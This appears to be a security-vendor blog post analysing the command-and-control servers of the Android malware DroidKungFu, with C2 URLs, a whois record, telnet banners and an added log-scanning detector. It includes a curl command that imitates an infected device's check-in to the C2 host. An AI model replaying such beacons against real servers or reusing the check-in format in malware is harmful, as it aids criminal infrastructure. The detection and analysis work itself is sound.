High Performance Network Security, Enterprise and Data-Center Firewall

Android/DroidKungFu: attacking from a mobile device?

by RSS Axelle Apvrille  |  June 16, 2011  |  Category: Security Research

The Android malware DroidKungFu reports back to the following URLs:

http://[REMOVED]fu-android.com:8511/search/rpty.php
http://[REMOVED]fu-android.com:8511/search/getty.php
http://[REMOVED]fu-android.com:8511/search/sayhi.php

A whois on the corresponding IP address replies with the following most peculiar information: it looks like the IP address belongs to a mobile device (either a phone, or a tablet, or a computer with a 2G/3G connection...) of a well-known Chinese operator. Of course, we have immediately notified this operator. This is rather surprising since, usually, attacks on mobile phones (especially command & control servers) are conducted from a host on the Internet.

$ whois [REMOVED]6.37.93
 ...
 inetnum:      [REMOVED]4.0.0 - [REMOVED].255.255
 netname:      [REMOVED]NET-JS
 descr:        [REMOVED]NET jiangsu province network
 descr:        [REMOVED - Belongs to a Chinese operator] Telecom
 descr:        A12,Xin-Jie-Kou-Wai Street
 descr:        Beijing 100088
 country:      CN
 admin-c:      CH93-AP
 tech-c:       CJ186-AP
 mnt-by:       APNIC-HM
 mnt-lower:    MAINT-[REMOVED]NET-JS
 mnt-routes:   MAINT-[REMOVED]NET-JS
 ...
 status:       ALLOCATED PORTABLE
 source:       APNIC

We tried to fingerprint the operating system of the host at that IP address:

curl -F 'imei=12345899;managerid=yutian07' -A 'Mozilla/5.0 (Linux; U;
  Android 2.1-update1; en-us; ADR6300 Build/ERE27)
  AppleWebKit/530.17 (KHTML, like Gecko)
  Version/4.0 Mobile Safari/530.17'
  http://[REMOVED]fu-android.com:8511/search/sayhi.php
OK

We can try a few other combinations, but they don't tell much more about the OS it's running on.
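The check-in format shown above (POST to one of the three /search/*.php paths on port 8511, with ';'-separated imei and managerid fields) is enough to spot infected devices in outbound proxy logs. The detector below is an added example, not code from the original post: the host name, the log layout and the log lines are constructed, and only the paths, port and field names come from the page.

```python
from urllib.parse import urlsplit

# Beacon paths and port reported on the page; the host itself is a placeholder
BEACON_PATHS = {"/search/rpty.php", "/search/getty.php", "/search/sayhi.php"}
BEACON_PORT = 8511
BEACON_FIELDS = {"imei", "managerid"}

# Constructed proxy log lines (not real traffic): src, method, url, body
SAMPLE_LOG = """\
10.0.0.12 POST http://c2-placeholder.example:8511/search/sayhi.php imei=12345899;managerid=yutian07
10.0.0.12 GET http://www.example.com/ -
10.0.0.15 POST http://c2-placeholder.example:8511/search/rpty.php imei=99887766;managerid=abc
10.0.0.20 POST http://shop.example.com/search/getty.php q=phone
"""

def body_fields(body):
    # DroidKungFu's check-in body is ';'-separated key=value pairs (see the curl above)
    fields = {}
    for pair in body.split(";"):
        if "=" in pair:
            key, value = pair.split("=", 1)
            fields[key] = value
    return fields

def is_beacon(method, url, body):
    parts = urlsplit(url)
    if method != "POST" or parts.path not in BEACON_PATHS:
        return False
    # Require the unusual port or the check-in fields, so an ordinary site
    # that happens to serve a /search/getty.php is not flagged
    port_hit = parts.port == BEACON_PORT
    field_hit = BEACON_FIELDS <= set(body_fields(body))
    return port_hit or field_hit

def scan_log(text):
    # Returns (source address, beacon path, reported IMEI) for each check-in found
    hits = []
    for line in text.splitlines():
        src, method, url, body = line.split(" ", 3)
        if is_beacon(method, url, body):
            hits.append((src, urlsplit(url).path, body_fields(body).get("imei")))
    return hits

if __name__ == "__main__":
    for src, path, imei in scan_log(SAMPLE_LOG):
        print(f"DroidKungFu check-in from {src}: {path} imei={imei}")
```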

Let's try a telnet:

So, it's (likely) an Apache 2.2.3 on CentOS. Another telnet on port 22 tells us there's an OpenSSH 4.3 server too:

telnet [REMOVED]fu-android.com 22
Trying [REMOVED]7.93...
Connected to [REMOVED]fu-android.com.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3

It is technically possible to run a web server and an SSH server on an Android phone, but they would probably offer poor performance. I would rather go for an Android tablet or a computer with a 2G/3G connection. Any other assumption or comment on the motivation behind this Android malware?

Android/DroidKungFu was discovered by Prof. Xuxian Jiang and his team. Thanks for sharing samples.

-- the Crypto Girl
